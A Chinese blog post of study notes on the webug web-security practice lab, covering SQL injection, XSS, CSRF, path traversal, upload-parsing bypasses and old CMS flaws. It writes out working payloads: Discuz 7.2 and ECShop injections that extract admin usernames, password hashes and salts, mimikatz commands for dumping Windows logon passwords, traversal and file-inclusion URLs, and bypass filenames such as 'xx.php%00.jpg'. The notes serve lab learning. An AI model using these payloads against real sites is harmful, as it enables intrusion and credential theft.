webug基础与中级小结

  • by

正文:

基础测试:

1. gid=1′ union select 1,2,3,user()’    url会乱码
2.  FF D8 FF D9  文件头文件尾
3.md5加密,照着它的做 扫到一半没有扫了,就有一个test,Test(windows下,目录不区分大小写)
4.爆破 admin (burp2017自带的字典没有那个密码,自己做)
5.
http头注入的几种方式(都试试)
User-Agent
cookie
X-forwarded-For
Client-IP
Rerderer
Host
6.  用最少钱购买(自己还没有从根本上理解到为什么要这么做)
7.  越权,抓包改name
8.  csrf 将更改密码的请求用Burpsuite截获 可一键生成CSRF PoC(要管理员点击。。。)
9.  url跳转    ?url=www.baidu.com
10.
文件下载 (get post两种)
not found (扫目录)
http://192.168.230.130/pentest/test/6/1/download.php?fname=../../../pentest/test/6/1/db/config.php(不同的../../  跳到不同的目录)
11.
d盘是驱动器
Winnt\System32\Config\SAM
菜刀不行,自己去windows2003看,文件正在访问中
系统类型为X86-based PC就是32位否则位X64 systeminfo
mimikatz(Windows密码抓取神器)
privilege::debug
sekurlsa::logonpasswords
12.
xss:
<img src onerror=alert(1)>
13.  Content-Type
引用:

黑名单,白名单
Content-Type
1.老版本的IIS中的目录解析漏洞,如果网站目录中有一个 /.asp/目录,那么此目录下面的一切内容都会被当作asp脚本来解析
2.老板本的IIS中的分号漏洞:IIS在解析文件名的时候可能将分号后面的内容丢弃,那么我们可以在上传的时候给后面加入分号内容来避免黑名单过滤,如 a.asp;jpg
3.旧版Windows Server中存在空格和dot漏洞类似于 a.php. 和 a.php[空格] 这样的文件名存储后会被windows去掉点和空格,从而使得加上这两个东西可以突破过滤,成功上传,并且被当作php代码来执行
4.nginx空字节漏洞 xxx.jpg%00.php 这样的文件名会被解析为php代码运行
5.apache的解析漏洞,上传如a.php.rar a.php.gif 类型的文件名,可以避免对于php文件的过滤机制,但是由于apache在解析文件名的时候是从右向左读,如果遇到不能识别的扩展名则跳过,rar等扩展名是apache不能识别的,因此就会直接将类型识别为php,从而达到了注入php代码的目的
制作内涵图的方法
总结
nginx(0.7.65以下)
1.jpg/php
1.jpg%00.php
iis(5.0,6.0)
目录解析,当目录名字为1.asp
把图片木马传上去之后访问
1.asp/1.jpg就会执行
文件名解析
1.asp;.jpg
遇到;结束
除了asp之外还有 .asa/.cer/.cdr
iis(7.0 7.5)
1.jpg/asp
apache 解析漏洞
就是文件名在解析的时候时从右至左的去解析
那么我们就可以这样做
1.php.asp.rar
就是把不能解析的都放在后面。最后就是1.php了
windows下的文件漏洞
不可以加 空格 和小数点
会被默认去除掉

14.  把referer改成百度(这个就有点绝了,知识点不错)

中级进阶:

学习漏洞思路吧,版本都很老了,主要是学习各个版本的历史漏洞吧
copy,然后去搜漏洞利用,解析要用到大量php知识,所以本人决定先借做php博客再深入学习一下php知识,再回过头来分析,先借用网上分析一波
1.host的头文件(把ip全部删除,改成ip)
Unknown column ‘5’ in ‘order clause’
2.引用:apk用android killer打开 不是很懂apk逆向也大致看了一下 把这四个base64解密好像就是flag了
或者点击apk里面的按钮三百下 就会给出flag
3.sql时间,改payload
pentesterlab
4.
dz7.2

搭建 dz7.2
试了下,用ucenter和7.2源码才能连接到数据库
x版本网上显示的图直接就可以

http://www.freebuf.com/vuls/37643.html 得到账号和密码

http://xss.com/bbs/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%20concat%28username,0x3a,password,0x3a,salt%29%20from%20uc_members%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23
http://xss.com/bbs/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28version%28%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23

http://www.mamicode.com/info-detail-1398542.html       xml–getshell
https://www.nigesb.com/discuz-7-2-sql-injection-and-getshell.html getshell
http://www.freebuf.com/articles/web/152211.html 分析注入原理

分析注入原理
148行
185行定义了一个数组groupids,然后遍历同样是数组的gids,将数组中所有值的第一位取出来放在groupids中
dz在全局会对get传递过来的数组用函数addslashes进行转义,单引号 ‘ 会被转义成 \’ 。
而 $groupids[] = $row[0] 又取了字符串的第一个字符,也就是把 \ 转义符号给取出来了。
再到190行末尾 对 groupids 用implodeids函数进行了处理
$groupids = array();
foreach($gids as $row) {
$groupids[] = $row[0];
}
在 /include/global.func.php中 672行 看到implodeids函数
function implodeids($array) {
if(!empty($array)) {
return "'".implode("','", is_array($array) ? $array : array($array))."'";
} else {
return '';
}
}
如果数组不为空就将其用 ‘,’ 分隔开,就好像1234返回’1′,’2′,’3′,’4′
但前面取出了一个 \ 转义符号就变成了
’1′,’\’,’3′,’4′
第4个单引号就被转义了,第3个单引号就与第5个单引号闭合了,那么“3”就逃逸出了单引号的限制,产生了注入。
faq.php?gids[x]=’&gids[x+1][uid]=sql 如此构造就可以突破安全处
x和7版本的区别联系
7.n的版本,是以前的代码结构,每个功能有单独的文件。X以后的,把代码结构完全重写了,所有的功能都统一格式、统一文件,写在一起,而且功能增加了很多,以前7时代的插件,基本上都成了X的默认功能,特别是增加了手机版。
至于模块倒没太大区别,7.n有论坛、个人空间、UC什么的,X之后的也是论坛、个人空间、UC之类的,加了个门户。
7版本早已停止更新了,补丁也不打了

2.
phpMyAdmin 任意文件包含漏洞(还有待分析)http://www.freebuf.com/articles/web/152211.html
http://localhost/pma4.0.3/gis_data_editor.php?token=4f4b3ee07ffc84e6bbef624931ae6999&gis_data[gis_type]=/../../advisory_rules.txt%00
./libraries/gis/pma_gis_file
存在漏洞的已知版本为 2.8.0.3,2.11及以上版本已修复 https://www.92aq.com/2016/08/23/phpmyadmin-arbitrary-file-include.html
phpMyadmin 4.0.3 + php 5.2.17 https://www.cnblogs.com/Oran9e/p/8059954.html
3.
齐博7.0漏洞
https://www.cnblogs.com/vspiders/p/7399088.html
4.
海盗云南:
http://0day5.com/archives/3686/
http://www.5kik.com/php0day/424.html
$avatar = $_GET[‘avatar’];有关切只验证上传文件的后缀
海盗云商前台getshell
xx.php%00.jpg
image/jpeg
没有抓到包(疑惑)
5.
php168
http://287611699.blog.163.com/blog/static/1225425012010812102741295/
http://www.safe.sh/security/?type=detail&id=1680
6.
ecshop
bugscan上的漏洞
http://www.freebuf.com/column/171830.html 3.0.0的漏洞集合
http://www.52bug.cn/%E9%BB%91%E5%AE%A2%E6%8A%80%E6%9C%AF/4913.html
友情链接是关键
order_id
order_id=1 or extractvalue(1,concat(0x7e,(SELECT distinct concat (0x23,user_name,0x3a,ec_salt,0x23) FROM ecs_admin_user limit 0,1))) or 1#
cms/ecshop/flow.php?step=repurchase
order_id=1 or extractvalue (1,concat(0x7e,(SELECT database()))) or 1#
7.
shopxp (打不开,确定不了版本)
8.
dcore(轻型cms)(打不开,确定不了版本)
9.
MetInfo|米拓企业建站系统
MetInfo 5.1.7任意文件包含漏洞可getshell http://www.hackdig.com/?07/hack-5017.htm
index=a&skin=default/../&dataoptimize_html=/../../upload/file/1449564120.jpg
metinfo的全局变量覆盖机制
feedback\uploadfile_save.php前台上传文件的地方 文件路径可以爆破之 (100 -999) 随机 简单爆破(没看懂)
http://www.0891display.cn//index.php?index=a&skin=default/../&dataoptimize_html=/../../upload/file/1449564120.jpg
 
2018.5.26
 
 

标签:

发表评论

电子邮件地址不会被公开。 必填项已用*标注